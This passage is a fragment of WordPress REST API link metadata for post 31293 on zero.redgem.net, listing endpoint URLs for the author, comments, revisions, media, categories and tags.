:[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=31293"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31293\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=31293"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=31293"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=31293"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}